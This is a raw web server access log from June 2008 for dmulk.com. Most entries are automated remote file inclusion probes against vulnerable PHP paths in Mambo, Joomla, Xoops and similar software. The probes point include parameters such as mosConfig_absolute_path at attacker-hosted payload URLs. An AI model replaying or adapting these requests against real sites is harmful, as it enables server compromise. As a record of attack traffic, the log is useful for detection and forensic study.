216.32.68.226 - - [08/Jun/2008:11:15:28 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:16:06 -0700] "GET /logs/access_080308.log//mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:16:07 -0700] "GET //mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:16:09 -0700] "GET /logs//mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:16:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:16:10 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:16:12 -0700] "GET /logs/access_071224.log/components/com_simpleboard/image_upload.php?sbp=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:16:44 -0700] "GET /general.php?menue=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:16:49 -0700] "GET /logs/general.php?menue=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:11:17:12 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:17:31 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:17:37 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:17:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:17:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:17:57 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:17:58 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.55.90.2 - - [08/Jun/2008:11:17:58 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://hotelfenix.pl/doc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [08/Jun/2008:11:17:59 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://hotelfenix.pl/doc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:18:05 -0700] "GET /logs/access_071224.log/skin/zero_vote/ask_password.php?dir=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:05 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:18:05 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:06 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:18:06 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:06 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:09 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:18:13 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:18:15 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:18:21 -0700] "GET /logs/access_080122.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:18:57 -0700] "GET /logs/access_071225.log/skin/zero_vote/ask_password.php?dir=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.237.236.11 - - [08/Jun/2008:11:19:06 -0700] "GET /phphtml.php?htmlclass_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:19:29 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:38 -0700] "GET /logs/access_080429.log//login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:38 -0700] "GET /logs/access_080429.log//ws/login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:39 -0700] "GET //login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:39 -0700] "GET //ws/login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:39 -0700] "GET /logs//login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:11:19:39 -0700] "GET /logs//ws/login.php?includedir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:19:45 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:19:50 -0700] "GET //index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 200 16887 "-" "libwww-perl/5.812" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:19:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.119.200.212 - - [08/Jun/2008:11:19:56 -0700] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://media-day.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:20:11 -0700] "GET /logs/index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:20:12 -0700] "GET /index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:11:20:31 -0700] "GET /logs/access_080429.log//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:11:20:31 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [08/Jun/2008:11:20:31 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:20:33 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:20:58 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:21:05 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:21:16 -0700] "GET /logs/access_080429.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:21:36 -0700] "GET /myevent.php?myevent_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:21:43 -0700] "GET /logs/myevent.php?myevent_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:21:59 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:22:00 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:22:00 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:22:09 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:22:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:22:10 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:22:19 -0700] "GET /logs/index.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:22:27 -0700] "GET /index.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 200 16839 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:11:22:28 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=slide&nggpage=3 HTTP/1.1" 200 7921 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:23:32 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:23:48 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:23:49 -0700] "GET //include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:23:49 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:23:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:23:51 -0700] "GET /logs//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:23:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:23:51 -0700] "GET //mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:23:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:24:02 -0700] "GET /logs//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:24:02 -0700] "GET //mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:24:09 -0700] "GET /logs/access_080117.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:24:16 -0700] "GET /config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:24:41 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:24:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:24:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:24:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:11:24:51 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:11:24:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:25:24 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:25:24 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:11:25:36 -0700] "GET /logs/index1.php?choix=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:11:25:37 -0700] "GET /index1.php?choix=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:25:45 -0700] "GET /logs/access_080219.log//mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:11:26:23 -0700] "GET /logs/access_080507.log//language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:26:32 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:26:34 -0700] "GET //index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 200 16859 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:26:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:11:26:44 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:27:11 -0700] "GET /logs/access_080429.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:27:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:27:35 -0700] "GET /logs/page.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:27:35 -0700] "GET /page.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:27:36 -0700] "GET /logs/access_080110.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:27:37 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:27:37 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:27:46 -0700] "GET /logs/access_080308.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.189 - - [08/Jun/2008:11:28:25 -0700] "GET /blane/?D=A HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.212.113.110 - - [08/Jun/2008:11:28:35 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.212.113.110 - - [08/Jun/2008:11:28:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.212.113.110 - - [08/Jun/2008:11:28:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:28:38 -0700] "GET /logs/access_080429.log//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:28:38 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:28:38 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:28:52 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:28:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:28:53 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:29:00 -0700] "GET /logs/access_080308.log//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [08/Jun/2008:11:29:00 -0700] "GET /logs/access_080308.log//mcf.php?content=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:29:27 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:29:27 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:29:39 -0700] "GET /logs/?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 200 50988 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:29:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:29:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:29:43 -0700] "GET /?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 200 16921 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:11:29:48 -0700] "GET /logs/access_080302.log//modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:11:29:48 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
